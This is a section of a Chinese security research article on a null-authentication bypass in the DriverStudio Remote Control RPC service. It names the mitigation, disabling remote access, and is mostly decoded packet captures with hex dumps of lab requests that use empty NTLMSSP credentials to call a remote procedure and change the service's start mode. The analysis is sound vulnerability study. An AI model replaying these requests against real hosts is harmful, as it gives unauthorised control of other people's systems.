☆ 使用空认证访问DriverStudio Remote Control服务 2005年9月14日cocoruder对外发布了一份与该服务相关的文档([23])。他发现的这个 漏洞是指可以用空认证绕过权限检查,注意空认证与没有认证是两个概念。 去DriverStudio的设置界面里禁止远程访问即可,不过缺省是允许的。 他没有给演示代码及CAP文件,不过重点部分已经说清楚了。因为与AUTH3(16)报文有 关,顺便测试了一下,这里给两个示例。将启动方式改成disabled(测试的是3.1版): -------------------------------------------------------------------------- 166 DCERPC 192.168.7.2 192.168.7.151 3194 1032 Bind: call_id: 1 UUID: 32d90706-b698-4029-b236-e18ebff582b1 ver 1.0, NTLMSSP_NEGOTIATE 298 DCERPC 192.168.7.151 192.168.7.2 1032 3194 Bind_ack: call_id: 1, NTLMSSP_CHALLENGE accept max_xmit: 5840 max_recv: 5840 169 DCERPC 192.168.7.2 192.168.7.151 3194 1032 AUTH3: call_id: 1, NTLMSSP_AUTH, User: \ 134 DCERPC 192.168.7.2 192.168.7.151 3194 1032 Request: call_id: 2 opnum: 1 ctx_id: 0 UNKUUID: 32d90706-b698-4029-b236-e18ebff582b1 rpcver: 1 82 DCERPC 192.168.7.151 192.168.7.2 1032 3194 Response: call_id: 2 ctx_id: 0 UNKUUID: 32d90706-b698-4029-b236-e18ebff582b1 rpcver: 1 DCE RPC Bind, Fragment: Single, FragLen: 112, Call: 1 Version: 5 Version (minor): 0 Packet type: Bind (11) Packet Flags: 0x03 0... .... = Object: Not set .0.. .... = Maybe: Not set ..0. .... = Did Not Execute: Not set ...0 .... = Multiplex: Not set .... 0... = Reserved: Not set .... .0.. = Cancel Pending: Not set .... ..1. = Last Frag: Set .... ...1 = First Frag: Set Data Representation: 10000000 Byte order: Little-endian (1) Character: ASCII (0) Floating-point: IEEE (0) Frag Length: 112 Auth Length: 32 Call ID: 1 Max Xmit Frag: 5840 Max Recv Frag: 5840 Assoc Group: 0x00000000 Num Ctx Items: 1 Context ID: 0 Num Trans Items: 1 Interface UUID: 32d90706-b698-4029-b236-e18ebff582b1 Interface Ver: 1 Interface Ver Minor: 0 Transfer Syntax: 8a885d04-1ceb-11c9-9fe8-08002b104860 Syntax ver: 2 Auth type: NTLMSSP (10) Auth level: Connect (2) Auth pad len: 0 Auth Rsrvd: 0 Auth Context ID: 1373592 NTLMSSP NTLMSSP identifier: NTLMSSP NTLM Message Type: NTLMSSP_NEGOTIATE (0x00000001) Flags: 0xa0088207 1... .... .... .... .... .... .... .... = Negotiate 56: Set .0.. .... .... .... .... .... .... .... = Negotiate Key Exchange: Not set ..1. .... .... .... .... .... .... .... = Negotiate 128: Set ...0 .... .... .... .... .... .... .... = Negotiate 0x10000000: Not set .... 0... .... .... .... .... .... .... = Negotiate 0x08000000: Not set .... .0.. .... .... .... .... .... .... = Negotiate 0x04000000: Not set .... ..0. .... .... .... .... .... .... = Negotiate 0x02000000: Not set .... ...0 .... .... .... .... .... .... = Negotiate 0x01000000: Not set .... .... 0... .... .... .... .... .... = Negotiate Target Info: Not set .... .... .0.. .... .... .... .... .... = Negotiate 0x00400000: Not set .... .... ..0. .... .... .... .... .... = Negotiate 0x00200000: Not set .... .... ...0 .... .... .... .... .... = Negotiate 0x00100000: Not set .... .... .... 1... .... .... .... .... = Negotiate NTLM2 key: Set .... .... .... .0.. .... .... .... .... = Negotiate Challenge Non NT Session Key: Not set .... .... .... ..0. .... .... .... .... = Negotiate Challenge Accept Response: Not set .... .... .... ...0 .... .... .... .... = Negotiate Challenge Init Response: Not set .... .... .... .... 1... .... .... .... = Negotiate Always Sign: Set .... .... .... .... .0.. .... .... .... = Negotiate This is Local Call: Not set .... .... .... .... ..0. .... .... .... = Negotiate Workstation Supplied: Not set .... .... .... .... ...0 .... .... .... = Negotiate Domain Supplied: Not set .... .... .... .... .... 0... .... .... = Negotiate 0x00000800: Not set .... .... .... .... .... .0.. .... .... = Negotiate 0x00000400: Not set .... .... .... .... .... ..1. .... .... = Negotiate NTLM key: Set .... .... .... .... .... ...0 .... .... = Negotiate Netware: Not set .... .... .... .... .... .... 0... .... = Negotiate Lan Manager Key: Not set .... .... .... .... .... .... .0.. .... = Negotiate Datagram Style: Not set .... .... .... .... .... .... ..0. .... = Negotiate Seal: Not set .... .... .... .... .... .... ...0 .... = Negotiate Sign: Not set .... .... .... .... .... .... .... 0... = Request 0x00000008: Not set .... .... .... .... .... .... .... .1.. = Request Target: Set .... .... .... .... .... .... .... ..1. = Negotiate OEM: Set .... .... .... .... .... .... .... ...1 = Negotiate UNICODE: Set Calling workstation domain: NULL Calling workstation name: NULL 0030 05 00 0b 03 10 00 00 00 70 00 ........p. 0040 20 00 01 00 00 00 d0 16 d0 16 00 00 00 00 01 00 ............... 0050 00 00 00 00 01 00 06 07 d9 32 98 b6 29 40 b2 36 .........2..)@.6 0060 e1 8e bf f5 82 b1 01 00 00 00 04 5d 88 8a eb 1c ...........].... 0070 c9 11 9f e8 08 00 2b 10 48 60 02 00 00 00 0a 02 ......+.H`...... 0080 00 00 98 f5 14 00 4e 54 4c 4d 53 53 50 00 01 00 ......NTLMSSP... 0090 00 00 07 82 08 a0 00 00 00 00 00 00 00 00 00 00 ................ 00a0 00 00 00 00 00 00 ...... DCE RPC Bind_ack, Fragment: Single, FragLen: 244, Call: 1 Version: 5 Version (minor): 0 Packet type: Bind_ack (12) Packet Flags: 0x03 0... .... = Object: Not set .0.. .... = Maybe: Not set ..0. .... = Did Not Execute: Not set ...0 .... = Multiplex: Not set .... 0... = Reserved: Not set .... .0.. = Cancel Pending: Not set .... ..1. = Last Frag: Set .... ...1 = First Frag: Set Data Representation: 10000000 Byte order: Little-endian (1) Character: ASCII (0) Floating-point: IEEE (0) Frag Length: 244 Auth Length: 176 Call ID: 1 Max Xmit Frag: 5840 Max Recv Frag: 5840 Assoc Group: 0x00043360 Scndry Addr len: 5 Scndry Addr: 1032 Num results: 1 Context ID: 0 Ack result: Acceptance (0) Transfer Syntax: 8a885d04-1ceb-11c9-9fe8-08002b104860 Syntax ver: 2 Auth type: NTLMSSP (10) Auth level: Connect (2) Auth pad len: 0 Auth Rsrvd: 0 Auth Context ID: 1373592 NTLMSSP NTLMSSP identifier: NTLMSSP NTLM Message Type: NTLMSSP_CHALLENGE (0x00000002) Domain: SCZ-PWIN2K Length: 20 Maxlen: 20 Offset: 56 Flags: 0xa28a8205 1... .... .... .... .... .... .... .... = Negotiate 56: Set .0.. .... .... .... .... .... .... .... = Negotiate Key Exchange: Not set ..1. .... .... .... .... .... .... .... = Negotiate 128: Set ...0 .... .... .... .... .... .... .... = Negotiate 0x10000000: Not set .... 0... .... .... .... .... .... .... = Negotiate 0x08000000: Not set .... .0.. .... .... .... .... .... .... = Negotiate 0x04000000: Not set .... ..1. .... .... .... .... .... .... = Negotiate 0x02000000: Set .... ...0 .... .... .... .... .... .... = Negotiate 0x01000000: Not set .... .... 1... .... .... .... .... .... = Negotiate Target Info: Set .... .... .0.. .... .... .... .... .... = Negotiate 0x00400000: Not set .... .... ..0. .... .... .... .... .... = Negotiate 0x00200000: Not set .... .... ...0 .... .... .... .... .... = Negotiate 0x00100000: Not set .... .... .... 1... .... .... .... .... = Negotiate NTLM2 key: Set .... .... .... .0.. .... .... .... .... = Negotiate Challenge Non NT Session Key: Not set .... .... .... ..1. .... .... .... .... = Negotiate Challenge Accept Response: Set .... .... .... ...0 .... .... .... .... = Negotiate Challenge Init Response: Not set .... .... .... .... 1... .... .... .... = Negotiate Always Sign: Set .... .... .... .... .0.. .... .... .... = Negotiate This is Local Call: Not set .... .... .... .... ..0. .... .... .... = Negotiate Workstation Supplied: Not set .... .... .... .... ...0 .... .... .... = Negotiate Domain Supplied: Not set .... .... .... .... .... 0... .... .... = Negotiate 0x00000800: Not set .... .... .... .... .... .0.. .... .... = Negotiate 0x00000400: Not set .... .... .... .... .... ..1. .... .... = Negotiate NTLM key: Set .... .... .... .... .... ...0 .... .... = Negotiate Netware: Not set .... .... .... .... .... .... 0... .... = Negotiate Lan Manager Key: Not set .... .... .... .... .... .... .0.. .... = Negotiate Datagram Style: Not set .... .... .... .... .... .... ..0. .... = Negotiate Seal: Not set .... .... .... .... .... .... ...0 .... = Negotiate Sign: Not set .... .... .... .... .... .... .... 0... = Request 0x00000008: Not set .... .... .... .... .... .... .... .1.. = Request Target: Set .... .... .... .... .... .... .... ..0. = Negotiate OEM: Not set .... .... .... .... .... .... .... ...1 = Negotiate UNICODE: Set NTLM Challenge: CF7750957193BBE0 Reserved: 0000000000000000 Address List Length: 100 Maxlen: 100 Offset: 76 Domain NetBIOS Name: SCZ-PWIN2K Target item type: NetBIOS domain name (0x0002) Target item Length: 20 Target item Content: SCZ-PWIN2K Server NetBIOS Name: SCZ-PWIN2K Target item type: NetBIOS host name (0x0001) Target item Length: 20 Target item Content: SCZ-PWIN2K Domain DNS Name: SCZ-PWIN2K Target item type: DNS domain name (0x0004) Target item Length: 20 Target item Content: SCZ-PWIN2K Server DNS Name: SCZ-PWIN2K Target item type: DNS host name (0x0003) Target item Length: 20 Target item Content: SCZ-PWIN2K List Terminator Target item type: End of list (0x0000) Target item Length: 0 0030 05 00 0c 03 10 00 00 00 f4 00 .......... 0040 b0 00 01 00 00 00 d0 16 d0 16 60 33 04 00 05 00 ..........`3.... 0050 31 30 33 32 00 00 01 00 00 00 00 00 00 00 04 5d 1032...........] 0060 88 8a eb 1c c9 11 9f e8 08 00 2b 10 48 60 02 00 ..........+.H`.. 0070 00 00 0a 02 00 00 98 f5 14 00 4e 54 4c 4d 53 53 ..........NTLMSS 0080 50 00 02 00 00 00 14 00 14 00 38 00 00 00 05 82 P.........8..... 0090 8a a2 cf 77 50 95 71 93 bb e0 00 00 00 00 00 00 ...wP.q......... 00a0 00 00 64 00 64 00 4c 00 00 00 05 00 93 08 00 00 ..d.d.L......... 00b0 00 0f 53 00 43 00 5a 00 2d 00 50 00 57 00 49 00 ..S.C.Z.-.P.W.I. 00c0 4e 00 32 00 4b 00 02 00 14 00 53 00 43 00 5a 00 N.2.K.....S.C.Z. 00d0 2d 00 50 00 57 00 49 00 4e 00 32 00 4b 00 01 00 -.P.W.I.N.2.K... 00e0 14 00 53 00 43 00 5a 00 2d 00 50 00 57 00 49 00 ..S.C.Z.-.P.W.I. 00f0 4e 00 32 00 4b 00 04 00 14 00 53 00 43 00 5a 00 N.2.K.....S.C.Z. 0100 2d 00 50 00 57 00 49 00 4e 00 32 00 4b 00 03 00 -.P.W.I.N.2.K... 0110 14 00 53 00 43 00 5a 00 2d 00 50 00 57 00 49 00 ..S.C.Z.-.P.W.I. 0120 4e 00 32 00 4b 00 00 00 00 00 N.2.K..... DCE RPC AUTH3, Fragment: Single, FragLen: 115, Call: 1 Version: 5 Version (minor): 0 Packet type: AUTH3 (16) Packet Flags: 0x03 0... .... = Object: Not set .0.. .... = Maybe: Not set ..0. .... = Did Not Execute: Not set ...0 .... = Multiplex: Not set .... 0... = Reserved: Not set .... .0.. = Cancel Pending: Not set .... ..1. = Last Frag: Set .... ...1 = First Frag: Set Data Representation: 10000000 Byte order: Little-endian (1) Character: ASCII (0) Floating-point: IEEE (0) Frag Length: 115 Auth Length: 87 Call ID: 1 Auth type: NTLMSSP (10) Auth level: Connect (2) Auth pad len: 0 Auth Rsrvd: 0 Auth Context ID: 1373592 NTLMSSP NTLMSSP identifier: NTLMSSP NTLM Message Type: NTLMSSP_AUTH (0x00000003) Lan Manager Response: 00 Length: 1 Maxlen: 1 Offset: 86 NTLM Response: Empty Domain name: NULL User name: NULL Host name: NSFOCUS-SCZ Length: 22 Maxlen: 22 Offset: 64 Session Key: Empty Flags: 0xa0888a05 1... .... .... .... .... .... .... .... = Negotiate 56: Set .0.. .... .... .... .... .... .... .... = Negotiate Key Exchange: Not set ..1. .... .... .... .... .... .... .... = Negotiate 128: Set ...0 .... .... .... .... .... .... .... = Negotiate 0x10000000: Not set .... 0... .... .... .... .... .... .... = Negotiate 0x08000000: Not set .... .0.. .... .... .... .... .... .... = Negotiate 0x04000000: Not set .... ..0. .... .... .... .... .... .... = Negotiate 0x02000000: Not set .... ...0 .... .... .... .... .... .... = Negotiate 0x01000000: Not set .... .... 1... .... .... .... .... .... = Negotiate Target Info: Set .... .... .0.. .... .... .... .... .... = Negotiate 0x00400000: Not set .... .... ..0. .... .... .... .... .... = Negotiate 0x00200000: Not set .... .... ...0 .... .... .... .... .... = Negotiate 0x00100000: Not set .... .... .... 1... .... .... .... .... = Negotiate NTLM2 key: Set .... .... .... .0.. .... .... .... .... = Negotiate Challenge Non NT Session Key: Not set .... .... .... ..0. .... .... .... .... = Negotiate Challenge Accept Response: Not set .... .... .... ...0 .... .... .... .... = Negotiate Challenge Init Response: Not set .... .... .... .... 1... .... .... .... = Negotiate Always Sign: Set .... .... .... .... .0.. .... .... .... = Negotiate This is Local Call: Not set .... .... .... .... ..0. .... .... .... = Negotiate Workstation Supplied: Not set .... .... .... .... ...0 .... .... .... = Negotiate Domain Supplied: Not set .... .... .... .... .... 1... .... .... = Negotiate 0x00000800: Set .... .... .... .... .... .0.. .... .... = Negotiate 0x00000400: Not set .... .... .... .... .... ..1. .... .... = Negotiate NTLM key: Set .... .... .... .... .... ...0 .... .... = Negotiate Netware: Not set .... .... .... .... .... .... 0... .... = Negotiate Lan Manager Key: Not set .... .... .... .... .... .... .0.. .... = Negotiate Datagram Style: Not set .... .... .... .... .... .... ..0. .... = Negotiate Seal: Not set .... .... .... .... .... .... ...0 .... = Negotiate Sign: Not set .... .... .... .... .... .... .... 0... = Request 0x00000008: Not set .... .... .... .... .... .... .... .1.. = Request Target: Set .... .... .... .... .... .... .... ..0. = Negotiate OEM: Not set .... .... .... .... .... .... .... ...1 = Negotiate UNICODE: Set 0030 05 00 10 03 10 00 00 00 73 00 ........s. 0040 57 00 01 00 00 00 d0 16 d0 16 0a 02 00 00 98 f5 W............... 0050 14 00 4e 54 4c 4d 53 53 50 00 03 00 00 00 01 00 ..NTLMSSP....... 0060 01 00 56 00 00 00 00 00 00 00 57 00 00 00 00 00 ..V.......W..... 0070 00 00 40 00 00 00 00 00 00 00 40 00 00 00 16 00 ..@.......@..... 0080 16 00 40 00 00 00 00 00 00 00 57 00 00 00 05 8a ..@.......W..... 0090 88 a0 4e 00 53 00 46 00 4f 00 43 00 55 00 53 00 ..N.S.F.O.C.U.S. 00a0 2d 00 53 00 43 00 5a 00 00 -.S.C.Z.. DCE RPC Request, Fragment: Single, FragLen: 80, Call: 2 Ctx: 0, [Resp: #7] Version: 5 Version (minor): 0 Packet type: Request (0) Packet Flags: 0x03 0... .... = Object: Not set .0.. .... = Maybe: Not set ..0. .... = Did Not Execute: Not set ...0 .... = Multiplex: Not set .... 0... = Reserved: Not set .... .0.. = Cancel Pending: Not set .... ..1. = Last Frag: Set .... ...1 = First Frag: Set Data Representation: 10000000 Byte order: Little-endian (1) Character: ASCII (0) Floating-point: IEEE (0) Frag Length: 80 Auth Length: 16 Call ID: 2 Alloc hint: 20 Context ID: 0 Opnum: 1 Auth type: NTLMSSP (10) Auth level: Connect (2) Auth pad len: 12 Auth Rsrvd: 0 Auth Context ID: 1373592 Response in frame: 7 Stub data (20 bytes) Auth Padding (12 bytes) NTLMSSP Verifier Version Number: 1 Verifier Body: 000000000000000000000000 0030 05 00 00 03 10 00 00 00 50 00 ........P. 0040 10 00 02 00 00 00 14 00 00 00 00 00 01 00 06 00 ................ 0050 00 00 06 00 00 00 05 00 05 00 05 00 04 00 05 00 ................ 0060 04 00 00 00 00 00 3b 00 00 00 01 00 00 00 0a 02 ......;......... 0070 0c 00 98 f5 14 00 01 00 00 00 00 00 00 00 00 00 ................ 0080 00 00 00 00 00 00 ...... DCE RPC Response, Fragment: Single, FragLen: 28, Call: 2 Ctx: 0, [Req: #6] Version: 5 Version (minor): 0 Packet type: Response (2) Packet Flags: 0x03 0... .... = Object: Not set .0.. .... = Maybe: Not set ..0. .... = Did Not Execute: Not set ...0 .... = Multiplex: Not set .... 0... = Reserved: Not set .... .0.. = Cancel Pending: Not set .... ..1. = Last Frag: Set .... ...1 = First Frag: Set Data Representation: 10000000 Byte order: Little-endian (1) Character: ASCII (0) Floating-point: IEEE (0) Frag Length: 28 Auth Length: 0 Call ID: 2 Alloc hint: 4 Context ID: 0 Cancel count: 0 Opnum: 1 Request in frame: 6 Time from request: 0.004911000 seconds Stub data (4 bytes) 0030 05 00 02 03 10 00 00 00 1c 00 .......... 0040 00 00 02 00 00 00 04 00 00 00 00 00 00 00 00 00 ................ 0050 00 00 .. -------------------------------------------------------------------------- 用了空认证,结果仍成功调用了1号远程过程。 DCE/RPC V4时RpcBindingSetAuthInfo()的通信报文更加罕见,将启动方式改成 manual(测试的是3.1版): -------------------------------------------------------------------------- 166 DCERPC 192.168.7.2 192.168.7.151 4989 1033 Request: seq: 1 opnum: 1 len: 24 UNKUUID: 32d90706-b698-4029-b236-e18ebff582b1 rpcver: 1 150 DCERPC 192.168.7.151 192.168.7.2 1033 4989 Response: seq: 1 opnum: 1 len: 8 UNKUUID: 32d90706-b698-4029-b236-e18ebff582b1 rpcver: 1 DCE RPC Request, Seq: 1, Serial: 0, Frag: 0, FragLen: 24, [Resp: #7] Version: 4 Packet type: Request (0) Flags1: 0x08 "No Fack" 0... .... = Reserved: Not set .0.. .... = Broadcast: Not set ..0. .... = Idempotent: Not set ...0 .... = Maybe: Not set .... 1... = No Fack: Set .... .0.. = Fragment: Not set .... ..0. = Last Fragment: Not set .... ...0 = Reserved: Not set Flags2: 0x00 0... .... = Reserved: Not set .0.. .... = Reserved: Not set ..0. .... = Reserved: Not set ...0 .... = Reserved: Not set .... 0... = Reserved: Not set .... .0.. = Reserved: Not set .... ..0. = Cancel Pending: Not set .... ...0 = Reserved: Not set Data Representation: 100000 (Order: Little-endian, Char: ASCII, Float: IEEE) Byte order: Little-endian (1) Character: ASCII (0) Floating-point: IEEE (0) Serial High: 0x00 Object UUID: 00000000-0000-0000-0000-000000000000 Interface: 32d90706-b698-4029-b236-e18ebff582b1 Activity: f76a834e-c381-4e55-9eef-04e63b7bebe0 Server boot time: Feb 8, 2006 09:17:12.000000000 Interface Ver: 1 Sequence num: 1 Opnum: 1 Interface Hint: 0xffff Activity Hint: 0x003a Fragment len: 24 Fragment num: 0 Auth proto: NTLMSSP (10) Serial Low: 0x00 Authentication verifier Response in frame: 7 Stub data (24 bytes) 0020 04 00 08 00 10 00 ...... 0030 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 0040 00 00 06 07 d9 32 98 b6 29 40 b2 36 e1 8e bf f5 .....2..)@.6.... 0050 82 b1 4e 83 6a f7 81 c3 55 4e 9e ef 04 e6 3b 7b ..N.j...UN....;{ 0060 eb e0 98 46 e9 43 01 00 00 00 01 00 00 00 01 00 ...F.C.......... 0070 ff ff 3a 00 18 00 00 00 0a 00 06 00 00 00 06 00 ..:............. 0080 00 00 05 00 05 00 05 00 04 00 05 00 03 00 00 00 ................ 0090 00 00 04 00 12 00 01 00 00 00 c8 fa 12 00 44 d4 ..............D. 00a0 63 a7 bc d6 1c 87 c..... DCE RPC Response, Seq: 1, Serial: 0, Frag: 0, FragLen: 8, [Req: #6] Version: 4 Packet type: Response (2) Flags1: 0x08 "No Fack" 0... .... = Reserved: Not set .0.. .... = Broadcast: Not set ..0. .... = Idempotent: Not set ...0 .... = Maybe: Not set .... 1... = No Fack: Set .... .0.. = Fragment: Not set .... ..0. = Last Fragment: Not set .... ...0 = Reserved: Not set Flags2: 0x00 0... .... = Reserved: Not set .0.. .... = Reserved: Not set ..0. .... = Reserved: Not set ...0 .... = Reserved: Not set .... 0... = Reserved: Not set .... .0.. = Reserved: Not set .... ..0. = Cancel Pending: Not set .... ...0 = Reserved: Not set Data Representation: 100000 (Order: Little-endian, Char: ASCII, Float: IEEE) Byte order: Little-endian (1) Character: ASCII (0) Floating-point: IEEE (0) Serial High: 0x00 Object UUID: 00000000-0000-0000-0000-000000000000 Interface: 0008e89f-102b-6048-0200-00000a020000 Activity: f76a834e-c381-4e55-9eef-04e63b7bebe0 Server boot time: Feb 8, 2006 09:17:12.000000000 Interface Ver: 56 Sequence num: 1 Opnum: 46286 Interface Hint: 0xffff Activity Hint: 0x003a Fragment len: 8 Fragment num: 0 Auth proto: NTLMSSP (10) Serial Low: 0x00 Authentication verifier Request in frame: 6 Time from request: 0.005263000 seconds Stub data (8 bytes) 0020 04 02 08 00 10 00 ...... 0030 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 0040 00 00 9f e8 08 00 2b 10 48 60 02 00 00 00 0a 02 ......+.H`...... 0050 00 00 4e 83 6a f7 81 c3 55 4e 9e ef 04 e6 3b 7b ..N.j...UN....;{ 0060 eb e0 98 46 e9 43 38 00 00 00 01 00 00 00 ce b4 ...F.C8......... 0070 ff ff 3a 00 08 00 00 00 0a 00 00 00 00 00 08 4f ..:............O 0080 87 00 04 00 87 00 01 00 00 00 58 64 17 00 cd fa ..........Xd.... 0090 e8 3e bc d6 1c 87 .>.... -------------------------------------------------------------------------- [23] DriverStudio Remote Control远程调用认证绕过漏洞及其利用研究 - cocoruder [2005-09-14] http://www.xfocus.net/articles/200509/821.html